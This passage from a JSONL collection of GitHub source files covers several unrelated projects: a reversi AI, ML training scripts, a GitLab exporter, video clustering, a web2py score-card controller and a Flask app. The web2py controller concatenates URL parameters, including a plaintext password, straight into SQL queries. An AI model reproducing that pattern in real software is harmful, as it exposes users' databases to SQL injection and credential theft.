pos\n def find_available(self, player):\n availables = []\n for x in range(SIZE):\n for y in range(SIZE):\n if self.board[x,y] == 0:\n if np.sum(self.board != self.forward(player, (x,y))) > 1:\n availables.append((x,y))\n return availables\n \n \n # Judge if the game has ended.\n def judge_gameend(self):\n if np.sum(START_BOARD==0) == 0:\n return True\n elif (not self.find_available(1)) and (not self.find_available(-1)):\n return True\n else:\n return False\n \n \n # Judge the winner of this game\n # if draw, return 0\n def judge_winner(self):\n # 先手、後手の石の数\n num_1, num_2 = self.count_stones(-1), self.count_stones(1)\n if num_1 > num_2: return -1\n elif num_1 < num_2 : return 1\n else: return 0\n \n \n # Put a stone on a specific position.\n # arg: player, position\n # return: board\n def forward(self, player, pos):\n b = self.board.copy()\n b[pos] = player\n # Search in eight directions\n for i in (-1,0,1):\n for j in (-1,0,1):\n if (i==0 and j==0): continue\n # Search until the condition is satisfied\n for k in range(1,SIZE):\n x, y = pos[0]+i*k, pos[1]+j*k\n # Judge if the position is inside the board\n if (x not in np.arange(0,SIZE)) or (y not in np.arange(0,SIZE)): break\n if (self.board[x,y]==0): break\n if (self.board[x,y]==player):\n for l in range(1,k): b[pos[0]+i*l, pos[1]+j*l] = player\n break\n return b\n \n \n # The board-evaluation function for the player\n # arg: player\n # return: evaluation score for the player\n def eval_board(self, player):\n eb = self.eboards[player+1]\n return np.sum(eb * self.board) * player\n \n \n # Min-Max methods\n # arg: game, evaluator(first player), player, max-search-depth, threshold to cutoff\n # return: evaluation score, success of positions to take\n def minmax(self, evaluator, player, depth, limit):\n if depth == 0:\n return self.eval_board(evaluator), []\n\n switch = 1 if evaluator==player else -1\n value = -switch * np.inf\n choices = self.find_available(player)\n\n # When choices have no content\n if not choices:\n return self.eval_board(evaluator), []\n\n move = []\n for pos in choices:\n g = self.copy()\n g.board = g.forward(player, pos)\n v, m = g.minmax(evaluator, -player, depth-1, value)\n # min-max method (if switch=-1 -> value=min, switch=1 -> value=max)\n if value * switch < v * switch:\n value = v\n move = m + [pos]\n # alpha-beta method (The debug cannot be completed)\n #if value * switch >= limit * switch: break\n return value, move\n\n \n # find best move\n # arg: game, player(1 or -1), depth\n # return: score, best move\n def find_best_move(self, player, depth):\n result = self.minmax(player, player, depth, np.inf)\n try:\n score, best_move = result[0], result[1][-1]\n except:\n print(result)\n return score, best_move\n \n \n def player_action(self, player):\n # 石がまだ置ける時\n if self.find_available(player):\n evaluation = self.find_best_move(player, DEPTH)\n self.board = self.forward(player, evaluation[1])\n return \"Move: {}, Score: {}\".format(evaluation[1], evaluation[0])\n else:\n return \"----- No Choices -----\"\n \n\n def plot_board(self):\n for x in range(SIZE):\n for y in range(SIZE):\n s = self.board[x,y]\n if s==1: print('●', end='')\n elif s==-1: print('○', end='')\n else: print('-', end='')\n print()\n\n \n \n# play game without display\n# arg: The first player's evaluation func., the second player's evaluation func.\n# return: the winner\ndef play(first_eb, second_eb, debug_mode):\n start = time.time()\n game = Game(START_BOARD.copy(), first_eb, second_eb)\n # -1が先手\n player = -1\n while not game.judge_gameend():\n board = game.board.copy()\n _ = game.player_action(player)\n player *= -1\n end = time.time()\n if debug_mode:\n game.plot_board()\n print(\"time: {:3.1f} seconds\".format(end-start))\n return game.judge_winner()\n \n\n# Play game with display\n# arg: The first player's evaluation func., the second player's evaluation func.\n# return: \ndef play_usermode(first_eb, second_eb):\n print(\"----------------------\")\n print(\"----- Game Start -----\")\n print(\"----------------------\")\n print(\"first: Player(-1), second: Player(1)\")\n print()\n start = time.time()\n game = Game(START_BOARD.copy(), first_eb, second_eb)\n game.plot_board()\n # -1が先手\n player = -1\n while not game.judge_gameend():\n board = game.board.copy()\n print(game.player_action(player))\n game.plot_board()\n player *= -1\n end = time.time()\n print()\n print(\"--------------------\")\n print(\"----- Game End -----\")\n print(\"--------------------\")\n print(\"time: {:3.1f} seconds\".format(end-start))\n winner = game.judge_winner()\n if winner: print(\"The winner: Player({})\".format(winner))\n else: print(\"This game is Draw\")","repo_name":"u-keisuke/ga_reversi","sub_path":"reversi.py","file_name":"reversi.py","file_ext":"py","file_size_in_byte":6567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29706149642","text":"import boto3\nimport json\n\nendpoint_url = \"http://localhost:4576\"\nregion_name = \"ap-southeast-1\"\n\n# Choosing the resource from boto3 module\nsqs = boto3.resource('sqs', endpoint_url=endpoint_url, region_name=region_name)\ndynamodb = boto3.resource('dynamodb', endpoint_url=endpoint_url, region_name=region_name)\nclient = boto3.client('sqs', endpoint_url=endpoint_url, region_name=region_name)\n\n# Choose DynamoDB table\ntable = dynamodb.Table('message')\n\n# Get the queue named test\nqueue = sqs.get_queue_by_name(QueueName='test-queue')\n\n# Consume all messages from queue\ndef consumer(c):\n i=0\n while i 0:\r\n click.echo('WARNING: Export for following projects could not be scheduled:')\r\n for project in failed_scheduled_projects:\r\n click.echo(f'{project[\"name\"]} ({project[\"id\"]}): {project[\"reason\"]}')\r\n\r\n output_dir = path.join(path.abspath(output_dir),\r\n f'gitlab-export-{time.strftime(\"%Y-%m-%d-%H-%M-%S\")}')\r\n finished_ids = []\r\n iteration = 1\r\n with click.progressbar(length=len(scheduled_projects),\r\n label='Waiting for projects to be exported and download') as bar:\r\n while len(finished_ids) != len(scheduled_projects):\r\n for project in scheduled_projects:\r\n if project['id'] in finished_ids:\r\n continue\r\n\r\n export_status = http.get(f'{gitlab_api_url}/projects/{project[\"id\"]}/export')\r\n status = json.loads(export_status.content)\r\n if status['export_status'] != 'finished':\r\n continue\r\n\r\n download = http.get(f'{gitlab_api_url}/projects/{project[\"id\"]}/export/download')\r\n filename = f'{project[\"path\"]}_{project[\"id\"]}.tar.gz'\r\n if 'Content-Disposition' in download.headers:\r\n _, cd_params = cgi.parse_header(download.headers.get('Content-Disposition'))\r\n filename = cd_params['filename']\r\n namespace = project['path_namespaced']\r\n project_export_dir = path.join(output_dir, namespace)\r\n os.makedirs(project_export_dir)\r\n\r\n with open(path.join(project_export_dir, filename), 'wb') as f:\r\n f.write(download.content)\r\n\r\n finished_ids.append(project['id'])\r\n bar.update(len(finished_ids))\r\n\r\n time.sleep(iteration * 3)\r\n iteration += 1\r\n\r\n click.echo(f'Exported {len(finished_ids)} projects!')\r\n","repo_name":"marvinweber/gitlab-bulk-project-export","sub_path":"gitlab_bulk_project_export/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27671398670","text":"from data_preprocess.criteo import create_criteo_dataset\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.losses import mean_squared_error\nfrom tensorflow.keras.metrics import AUC\nfrom model import AFM\n\nfile = \"D:/data/kaggle_ad_ctr/train.txt\"\nembed_dim = 8\nattention_dense_dim = 8\nhidden_units = [256, 128, 64]\nlr = 0.0001\nbatch_size = 256\nepochs = 10\n# mode : 'afm' or 'fm'\nmode = 'fm'\n\nfeature_column, (train_X, train_y), (test_X, test_y) = create_criteo_dataset(file=file, embed_dim=embed_dim,\n read_part=True)\nmodel = AFM(feature_column, attention_dense_dim, mode)\nmodel.compile(optimizer=Adam(lr), loss=mean_squared_error, metrics=AUC())\nmodel.fit(x=train_X, y=train_y, batch_size=batch_size, epochs=epochs, validation_data=(test_X, test_y), shuffle=True)\nprint(\"model evaluate:\", model.evaluate(x=test_X, y=test_y))\n","repo_name":"LXXiaogege/recommendation","sub_path":"models/AFM/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4146471728","text":"import sys\nfrom random import random\nfrom math import floor\nfrom os import listdir, makedirs, path\nfrom os.path import isfile, join, exists\nfrom moviepy.editor import VideoFileClip\nfrom image_hash import image_hash\nfrom PIL import Image\nimport numpy as np\nimport config\nimport multiprocessing\nimport cached_results\nfrom Levenshtein import distance\nimport compare_strings\nfrom sklearn.cluster import KMeans\n\ndef eprint(s):\n print(s, file=sys.stderr)\n\n\ndef create_average_frame(video_clip):\n n_frames = 0\n dimensions = list(reversed(video_clip.size)) + [3]\n pixel_matrix = np.zeros(tuple(dimensions), dtype=np.uint8)\n for frame in video_clip.iter_frames():\n pixel_matrix = pixel_matrix + frame\n n_frames = n_frames + 1\n\n average_frame_matrix = pixel_matrix / n_frames\n return Image.fromarray(average_frame_matrix, 'RGB')\n\ndef load_frame_from_cache(file_name):\n image_name = path.basename(file_name).split('.')[0] + \".jpg\"\n image_path = path.join(config.image_path, image_name)\n #print(\"Loading image {}\".format(image_path))\n return Image.open(image_path)\n\ndef average_frame_is_cached(file_name):\n image_name = path.basename(file_name).split('.')[0] + \".jpg\"\n image_path = path.join(config.image_path, image_name)\n if exists(image_path):\n return True\n return False\n\ndef cache_image(image, file_name):\n image_name = path.basename(file_name).split('.')[0] + \".jpg\"\n image_path = path.join(config.image_path, image_name)\n image.save(image_path)\n \ndef create_video_hash(file_name):\n average_frame = None\n if average_frame_is_cached(file_name):\n average_frame = load_frame_from_cache(file_name)\n else:\n video_clip = VideoFileClip(file_name)\n average_frame = create_average_frame(video_clip)\n cache_image(average_frame, file_name)\n\n if file_name in cached_results.hashes:\n return cached_results.hashes[file_name]\n else:\n average_frame_hash = image_hash(average_frame)\n cached_results.add_hash(file_name, average_frame_hash)\n return average_frame_hash\n\ndef init_image_cache():\n if not exists(config.image_path):\n makedirs(config.image_path)\n\ndef find_closest_hash(h, hashes):\n closest = list(hashes)[0]\n smallest_d = 100\n for h2, name in hashes:\n d = compare_strings.compare(h, h2)\n if d < smallest_d:\n closest = (h2, name)\n smallest_d = d\n\n return closest\n\ndef main(argv):\n init_image_cache()\n data_path = argv[1]\n hash_video_list = []\n total_number_of_items = len(listdir(data_path))\n counter = 0\n\n for file_name in listdir(data_path):\n if(counter % 100 == 0):\n eprint(\"Hashing {}/{}\".format(counter, total_number_of_items))\n if(counter % 1000 == 0):\n cached_results.save()\n counter += 1\n\n if isfile(join(data_path, file_name)):\n video_hash = create_video_hash(join(data_path, file_name))\n hash_video_list.append((video_hash, path.basename(file_name),))\n\n eprint(\"Done hashing\")\n\n hash_video_array = np.array([i[0] for i in hash_video_list])\n kmeans = KMeans(n_clusters=10).fit(hash_video_array)\n videos = [i[1] for i in hash_video_list]\n\n for i in range(len(kmeans.labels_)):\n print(kmeans.labels_[i], videos[i])\n\n eprint(\"Done clustering\")\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"arnargisla/tfbd-ch3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74132728427","text":"#Usamos esta funcion para darle dimension y llenar la matriz \ndef llenarMatriz():\n dimension=int(input(\"Ingrese la dimesion de la matriz: \"))\n matriz = [[0] * dimension for _ in range(dimension)]\n\n for fila in range(dimension):\n for columna in range(dimension):\n while True: \n letra = input(f\"Ingrese la letra de la cadena numero: [{columna}]:\").upper()\n if (letra==\"A\" or letra==\"T\" or letra==\"C\" or letra==\"G\" ):\n matriz[fila][columna] = letra\n break\n else:\n print(\"El valor ingresado no es correcto intente nuevamente\")\n return matriz\n\ndef AnalizarCondcion(matriz1):\n coincidencia = 0\n # Empezamos a recorrer la matriz y evaluarla\n for i in range(len(matriz1)):\n for j in range(len(matriz1[0]) - 3):\n # Horizontal\n if len(set(matriz1[i][j : j + 4])) == 1:\n coincidencia += 1\n\n # Vertical\n if len(set(matriz1[i][j] for i in range(i, i + 4))) == 1:\n coincidencia += 1\n\n for i in range(len(matriz1) - 3):\n for j in range(len(matriz1[0]) - 3):\n \n if len(set(matriz1[i + k][j + k] for k in range(4))) == 1:\n coincidencia += 1\n\n \n if len(set(matriz1[i + k][j + 3 - k] for k in range(4))) == 1:\n coincidencia += 1\n #Retornamos la condicion de la persona: \n if coincidencia >= 2:\n return print(\"La persona es: Mutante\")\n else:\n return print(\"La persona no es: Mutante\")\n\n#Llamamos a las funciones\nMatriz= llenarMatriz()\nCondicon=AnalizarCondcion(Matriz)\n","repo_name":"LukaPerich/MutantsChallenge","sub_path":"Main/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9397370558","text":"#! \n# Sumit Das\n\nfrom textblob import Word\nimport sys\n\ntry:\n\tLENGTH=sys.argv[1]\nexcept:\n\tLENGTH=0\n\nwith open('WORDS.TXT') as f:\n lines = f.read().splitlines()\n\ni = 0\nfor i in range(0,len(lines)):\n\tif lines[i]:\n\t\tif len(lines[i]) == int(LENGTH) :\n\t\t\tword = Word(str(lines[i]))\n\t\t\tresult = word.spellcheck()\n\t\t\tif result[0][1] == 1.0 :\n\t\t\t\tif int(LENGTH) == 0:\n\t\t\t\t\tprint(result[0][0])\n\t\t\t\telse:\n\t\t\t\t\tif len(result[0][0]) == int(LENGTH) :\n\t\t\t\t\t\tprint(result[0][0])\n\t\t\t\t\nf.close()","repo_name":"RustyNails8/Letters2Words","sub_path":"2-MakeWords4mLists.py","file_name":"2-MakeWords4mLists.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9134606135","text":"import numpy as np\nimport pickle\nimport os\nfrom sklearn.cross_validation import train_test_split\nfrom chainer import cuda, Variable, optimizers, serializers\nimport chainer.functions as F\nfrom PIL import Image\nimport glob\nimport time\n\nfrom model import FaceSwapNet\nfrom model import VGG19\n\ndef conv_setup(ORIGINAL_VGG,VGG):\n VGG.conv1_1 = ORIGINAL_VGG.conv1_1\n VGG.conv1_2 = ORIGINAL_VGG.conv1_2\n VGG.conv2_1 = ORIGINAL_VGG.conv2_1\n VGG.conv2_2 = ORIGINAL_VGG.conv2_2\n VGG.conv3_1 = ORIGINAL_VGG.conv3_1\n VGG.conv3_2 = ORIGINAL_VGG.conv3_2\n VGG.conv3_3 = ORIGINAL_VGG.conv3_3\n VGG.conv4_1 = ORIGINAL_VGG.conv4_1\n VGG.conv4_2 = ORIGINAL_VGG.conv4_2\n \"\"\"\n VGG.conv4_3 = ORIGINAL_VGG.conv4_3\n VGG.conv5_1 = ORIGINAL_VGG.conv5_1\n VGG.conv5_2 = ORIGINAL_VGG.conv5_2\n VGG.conv5_3 = ORIGINAL_VGG.conv5_3\n VGG.fc6=ORIGINAL_VGG.fc6\n VGG.fc7=ORIGINAL_VGG.fc7\n \"\"\"\n return VGG\n \ndef load_data(content_path, style_path, target_width):\n X=[]\n for size in [8,16,32,64,128]:\n \n X_tmp=[]\n \"\"\"\n for path in glob.glob(content_path+\"*.jpg\"):\n image = Image.open(path).convert('RGB')\n X_tmp.append(np.array(image.resize((size, size), Image.ANTIALIAS))[:,:,::-1].transpose(2,0,1))\n np.save(\"X_\"+str(size)+\".npy\",np.array(X_tmp))\n \"\"\"\n \n X_tmp=np.load(\"X_\"+str(size)+\".npy\")\n X.append(np.array(X_tmp))\n print(\"size:{} {}loaded\".format(size,len(X_tmp)))\n \n style=[]\n for path in glob.glob(style_path+\"*\"):\n image = Image.open(path).convert('RGB')\n width, height = image.size\n target_height = int(round(float(height * target_width) / width))\n style.append(np.array(image.resize((target_width, target_height), Image.ANTIALIAS))[:,:,::-1].transpose(2,0,1))\n \n style=np.array(style)\n \n return X,style\n\n\n\ndef total_variation(x):\n xp = cuda.get_array_module(x.data)\n b, ch, h, w = x.data.shape\n wh = Variable(xp.asarray([[[[1], [-1]], [[0], [0]], [[0], [0]]], [[[0], [0]], [[1], [-1]], [[0], [0]]], [[[0], [0]], [[0], [0]], [[1], [-1]]]], dtype=xp.float32), volatile=x.volatile)\n ww = Variable(xp.asarray([[[[1, -1]], [[0, 0]], [[0, 0]]], [[[0, 0]], [[1, -1]], [[0, 0]]], [[[0, 0]], [[0, 0]], [[1, -1]]]], dtype=xp.float32), volatile=x.volatile)\n return F.sum(F.convolution_2d(x, W=wh) ** 2) + F.sum(F.convolution_2d(x, W=ww) ** 2)\n\n\n\n\nvgg=VGG19()\noriginal_vgg19=VGG19()\nserializers.load_hdf5(\"vgg19.model\",original_vgg19)\n\nvgg=conv_setup(original_vgg19,vgg)\ndel original_vgg19\n\ncnn=FaceSwapNet()\n\nX,style=load_data(content_path=\"data/content/fin_celebA/\",style_path=\"data/style/\",target_width=128)\nprint(\"succesfully data loaded!\")\n\nX_train=[]\nX_test=[]\nfor i in range(len(X)):\n X_train.append(X[i][:-10])\n X_test.append(X[i][-10:])\ndel X\n\noptimizer=optimizers.Adam(alpha=0.01)\noptimizer.setup(cnn)\n\ncnn.to_gpu()\nvgg.to_gpu()\nprint(\"model to gpu\")\n\nxp=cnn.xp\n\nN=len(X_train[0])\nbatch_size=16\nkernel=3\nalpha=1.0\nbeta=0\ngamma=1e-5\nn_epoch=10000\nsave_model_interval=1\nsave_image_interval=400\n\nstyle_patch=[]\nstyle_patch_norm=[]\n\"\"\"\nstyle=Variable(xp.array(style,dtype=xp.float32),volatile=True)\nstyle-=xp.array([[[[104]],[[117]],[[124]]]])\nstyle_feature=vgg(style)\nfor name in [\"3_1\",\"4_1\"]:\n patch_norm=xp.array([style_feature[name][0,:,j:j+kernel,i:i+kernel].data/xp.linalg.norm(style_feature[name][0,:,j:j+kernel,i:i+kernel].data) for j in range(style_feature[name].shape[2]-kernel+1) for i in range(style_feature[name].shape[3]-kernel+1)],dtype=xp.float32)\n \n patch=xp.array([style_feature[name][0,:,j:j+kernel,i:i+kernel].data for j in range(style_feature[name].shape[2]-kernel+1) for i in range(style_feature[name].shape[3]-kernel+1)],dtype=xp.float32)\n \n np.save(\"style_patch_norm\"+name+\".npy\",cuda.to_cpu(patch_norm))\n np.save(\"style_patch\"+name+\".npy\",cuda.to_cpu(patch))\n\n style_patch.append(patch)\n style_patch_norm.append(patch_norm)\ndel patch,patch_norm\n\"\"\"\n\nstyle_patch_norm=[xp.array(np.load(\"style_patch_norm\"+name+\".npy\"),xp.float32) for name in [\"3_1\",\"4_1\"]]\nstyle_patch=[xp.array(np.load(\"style_patch\"+name+\".npy\"),xp.float32) for name in [\"3_1\",\"4_1\"]]\n\n\nfor epoch in range(1,n_epoch+1):\n print(\"epoch\",epoch)\n perm=np.random.permutation(N)\n for i in range(0,N,batch_size):\n if beta<0.4:\n beta+=0.0001\n print(i,N,batch_size)\n cnn.zerograds()\n vgg.zerograds()\n\n x1=xp.array(X_train[0][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n x2=xp.array(X_train[1][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n x3=xp.array(X_train[2][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n x4=xp.array(X_train[3][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n x5=xp.array(X_train[4][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n \n \n swap_X=cnn(x1,x2,x3,x4,x5)\n contents=Variable(xp.array(X_train[-1][perm[i:i+batch_size]],dtype=xp.float32),volatile=True)\n swap_X-=xp.array([[[[104]],[[117]],[[124]]]])\n contents-=xp.array([[[[104]],[[117]],[[124]]]])\n \n swap_feature=vgg(swap_X)\n content_feature=vgg(contents)\n ## content loss\n L_content=F.mean_squared_error(Variable(content_feature[\"4_2\"].data), swap_feature[\"4_2\"])\n ## style loss\n L_style=0\n for s,name in enumerate([\"3_1\",\"4_1\"]):\n L_style+=cnn.local_patch(swap_feature[name],Variable(style_patch[s],volatile=True),Variable(style_patch_norm[s],volatile=True))\n L_style/=2\n ## total variation loss\n L_tv=total_variation(swap_X)\n\n L=alpha*L_content+beta*L_style+gamma*L_tv\n L.backward()\n optimizer.update()\n\n\n if i%save_image_interval==0:\n for k,X in enumerate(swap_X.data):\n X = xp.transpose(X+xp.array([[[104]],[[117]],[[124]]]), (1,2,0))\n Image.fromarray(cuda.to_cpu(X)[:,:,::-1].astype(np.uint8)).save(\"out/portrait\"+str(epoch)+\"_\"+str(k)+\"_\"+str(beta)+\".jpg\")\n print(\"content loss={} style loss={} tv loss={}\".format(L_content.data/batch_size,L_style.data/batch_size,L_tv.data/batch_size))\n #with open(\"log.txt\",\"w\") as f:\n # f.write(\"content loss={} style loss={} tv loss={}\".format(sum_lc/N,sum_ls/N,sum_lt/N)+str(\"\\n\"))\n\n if epoch%save_model_interval==0:\n serializers.save_hdf5('PortraitModel_{}.model'.format(str(L.data/N).replace('.','')), cnn)\n \n","repo_name":"mikittt/portrait","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32280834721","text":"\n# Vamos utilizar o pacote requests para fazer requisições HTTP:\n# https://docs.python-requests.org/en/master/\n#\n# Para isso, ele precisa ser instalado via pip (de preferência com o VS Code fechado):\n# python -m pip install requests\nimport requests\n\nheaders={\n\n}\nresultado = requests.get(\"https://finance.yahoo.com/quote/TASA4.SA/history?p=TASA4.SA\")\n# Imprime algumas informações simples da resposta\n#print(resultado.status_code)\n#print(resultado.headers['content-type'])\n# Imprime a string pura da resposta\ntext = resultado.text\nprint(text)\n\n\n","repo_name":"hsandmann/espm.pi4.2022.1","sub_path":"exemplo/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29367836410","text":"\n#mpo\n#http://127.0.0.1:8000/hamdard/score_card_mobile/index?cid=Hamdard&rep_id=it03&rep_pass=1234\n\n\ndef index():\n c_id = request.vars.cid\n rep_id = request.vars.rep_id\n rep_pass = request.vars.rep_pass\n\n # ---------------------- rep check\n userRecords='select cid,rep_id,name,user_type from sm_rep where cid=\"'+c_id+'\" and rep_id=\"'+rep_id+'\" and password=\"'+rep_pass+'\" and status=\"ACTIVE\" limit 0,1;'\n userRecords=db.executesql(userRecords,as_dict=True)\n \n if len(userRecords)==0:\n response.flash = 'Invalid/Inactive Supervisor'\n else:\n for i in range(len(userRecords)):\n userRecordsS=userRecords[i]\n \n cid=userRecordsS['cid'] \n rep_id = str(userRecordsS['rep_id'])\n name = str(userRecordsS['name'])\n user_type = str(userRecordsS['user_type'])\n\n level3_id_str=''\n level_depth_no=''\n level_id=''\n if user_type == 'rep':\n userRecords = 'select area_id from sm_rep_area where cid=\"' + c_id + '\" and rep_id=\"' + rep_id + '\";'\n userRecords = db.executesql(userRecords, as_dict=True)\n\n if len(userRecords) == 0:\n response.flash = 'Invalid Territory'\n else:\n level3_id_list=[]\n for i in range(len(userRecords)):\n userRecordsS = userRecords[i]\n\n area_id = str(userRecordsS['area_id'])\n level3_id_list.append(area_id)\n\n if len(level3_id_list) > 0:\n level3_id_str = str(level3_id_list).replace('[', '').replace(']', '')\n\n\n else:\n userRecords = 'select level_depth_no,level_id from sm_supervisor_level where cid=\"' + c_id + '\" and sup_id=\"' + rep_id + '\" limit 0,1;'\n userRecords = db.executesql(userRecords, as_dict=True)\n\n if len(userRecords) == 0:\n response.flash = 'Invalid Level'\n else:\n for i in range(len(userRecords)):\n userRecordsS = userRecords[i]\n\n level_depth_no = userRecordsS['level_depth_no']\n level_id = str(userRecordsS['level_id'])\n\n\n\n\n session.cid = c_id\n session.user_id = rep_id\n session.user_type = user_type\n session.level3_id_str = level3_id_str\n session.level_depth_no = level_depth_no\n session.level_id = level_id\n\n redirect(URL('home', vars=dict()))\n\n return dict()\n\ndef home():\n c_id = session.cid\n rep_id=str(session.user_id)\n\n btn_report = request.vars.btn_report\n\n if btn_report:\n from_date = request.vars.from_date\n to_date = request.vars.to_date\n session.from_date = from_date\n session.to_date = to_date\n\n # dateFlag = True\n # try:\n # from_dt2 = datetime.datetime.strptime(str(from_date), '%Y-%m-%d')\n # to_dt2 = datetime.datetime.strptime(str(to_date), '%Y-%m-%d')\n # if from_date > to_dt2:\n # dateFlag = False\n # except:\n # dateFlag = False\n #\n # if dateFlag == False:\n # response.flash = \"Invalid Date Range\"\n # else:\n # dateDiff = (to_dt2 - from_dt2).days\n # if dateDiff > 1:\n # response.flash = \"Single days allowed between Date Range\"\n # else:\n # session.from_date = from_date\n # session.to_date = to_date\n\n\n\n records = ''\n condition=' cid=\"' + c_id + '\"'\n\n if session.from_date!=None and session.to_date!=None:\n condition += ' and submit_date>=\"' + session.from_date + '\" and submit_date<=\"' + session.to_date + '\" '\n\n if session.user_type == 'rep':\n if session.level3_id_str!='':\n condition += ' and level3_id in (' + session.level3_id_str + ') '\n else:\n if session.level_depth_no == 0:\n condition += ' and level0_id=\"' + session.level_id + '\" '\n elif session.level_depth_no == 1:\n condition += ' and level1_id=\"' + session.level_id + '\" '\n elif session.level_depth_no == 2:\n condition += ' and level2_id=\"' + session.level_id + '\" '\n\n\n\n\n records = 'select level0_id,level1_id,level2_id,level3_id,rep_id,rep_name,sum(ach) as ach,sum(pd_knowledge) as pd_knowledge,sum(rx_pres_share) as rx_pres_share,sum(pcpm) as pcpm,sum(four_p) as four_p,sum(reject_count) as reject_count,sum(facetime) as facetime,sum(walk_step_act_score) as walk_step_act_score,sum(overall_rate) as overall_rate from sm_score_card_details where ' + condition + ' group by level0_id,level1_id,level2_id,level3_id,rep_id;'\n records = db.executesql(records, as_dict=True)\n\n level_area_list=[]\n\n return dict(level_area_list=level_area_list,records=records)\n\n\ndef rep_details():\n c_id = session.cid\n rep_id=str(request.vars.rep_id)\n\n\n records = ''\n condition=' cid=\"' + c_id + '\"'\n condition += ' and rep_id=\"' + rep_id + '\" '\n\n if session.from_date!=None and session.to_date!=None:\n condition += ' and submit_date>=\"' + session.from_date + '\" and submit_date<=\"' + session.to_date + '\" '\n\n\n records = 'select level0_id,level1_id,level2_id,level3_id,rep_id,rep_name,sum(ach) as ach,sum(pd_knowledge) as pd_knowledge,sum(rx_pres_share) as rx_pres_share,sum(pcpm) as pcpm,sum(four_p) as four_p,sum(reject_count) as reject_count,sum(facetime) as facetime,sum(walk_step_act_score) as walk_step_act_score,sum(overall_rate) as overall_rate from sm_score_card_details where ' + condition + ' group by level0_id,level1_id,level2_id,level3_id,rep_id;'\n records = db.executesql(records, as_dict=True)\n\n\n\n return dict(records=records)\n\n","repo_name":"nadiranuri/acme_w05","sub_path":"controllers/score_card_mobile.py","file_name":"score_card_mobile.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23626913731","text":"#Main Views and URL endpoints to frontend of website\nfrom flask import Flask\nfrom flask import Blueprint, render_template, request, flash, jsonify, redirect, url_for\nfrom flask_mail import Mail, Message\nfrom email.message import EmailMessage\nfrom flask_login import login_required, current_user\nfrom .models import Feynman, Goal, Journal, Task, FinishedTask, ArchivedTask, Card, Lesson, Pride, Support\nfrom sqlalchemy.orm import aliased\nfrom . import db\nimport json, os, smtplib\nfrom datetime import date, datetime\nimport csv\nimport plotly.graph_objs as go\nfrom datetime import datetime, timedelta\nfrom sqlalchemy import and_, func, text\n\nviews = Blueprint('views', __name__)\n\n\napp = Flask(__name__)\n\n\n# Get the values of the environment variables\nmail_username = os.environ.get('MAIL_USERNAME')\nmail_password = os.environ.get('MAIL_PASSWORD')\n\n\n\n\n\n# Creating the Mail instance\nmail = Mail(app)\n\n\n# Defining the support email address\nsupport_email = \"proempohelpdesk@gmail.com\" \n\n\n\n\n@views.route('/')\n@login_required\ndef home():\n qod = generate_quote()\n currentDay = todays_date()\n print(current_user.language)\n if current_user.language == \"ro\":\n welcome = \"Bun venit la ProEmPo, \"\n currentDay = \"Astăzi este \" + today.strftime(\"%d.%m.%Y\")\n openNoisePlayer = \"Deschide playerul de zgomot alb\"\n journalIncomplete = \"Se pare că nu ați finalizat înregistrarea zilnică pentru astăzi.\"\n clickJournal = \"Faceți clic aici pentru a vă completa jurnalul.\"\n currenttasks = \"Sarcini curente:\"\n notasks = \"Nu aveți sarcini în prezent. Accesați sarcini pentru a face mai multe.\"\n journalComplete = \"Bună treabă, ați completat azi check-in-ul zilnic!\"\n dueReminder = \"Datorită:\"\n else:\n welcome = \"Welcome to ProEmPo, \"\n currentDay = currentDay\n openNoisePlayer = \"Open Noise Player\"\n journalIncomplete = \"It looks like you haven't completed your daily check-in for today.\"\n clickJournal = \"Click here to fill out your journal.\"\n currenttasks = \"Current Tasks:\"\n notasks = \"You have no tasks currently. Go to tasks to make more.\"\n journalComplete = \"Good Job, you filled out your daily check-in today!\"\n dueReminder = \"Due:\"\n entry_for_today = Journal.query.filter(Journal.date == today, Journal.user_id == current_user.id).first()\n tasks = Task.query.filter(Task.user_id == current_user.id).order_by(text(current_user.defaultsort))\n\n return render_template(\"home.html\", tasks=tasks, notasks=notasks, currenttasks=currenttasks, user=current_user, qod=qod, currentDay=currentDay, welcome=welcome,\n openNoisePlayer=openNoisePlayer, entry_for_today=entry_for_today, journalIncomplete=journalIncomplete, \n dueReminder=dueReminder, clickJournal=clickJournal, journalComplete=journalComplete)\n\ntoday = date.today()\n\ndef todays_date():\n day_str = today.strftime('%d')\n day_int = int(day_str)\n \n \n if day_int < 10:\n day = (today.strftime('%d')).lstrip('0')\n else:\n day = (today.strftime('%d'))\n \n if (day_int % 10 == 1):\n day = day + 'st'\n elif (day_int % 10 == 2):\n day = day + 'nd'\n elif (day_int % 10 == 3):\n day = day + 'rd'\n else:\n day = day + 'th'\n\n currentDay = today.strftime('%A, %B ' + day + ', %Y')\n\n return currentDay\ndef generate_quote():\n csv_file_path = os.path.join(app.root_path, 'static', 'list.csv')\n with 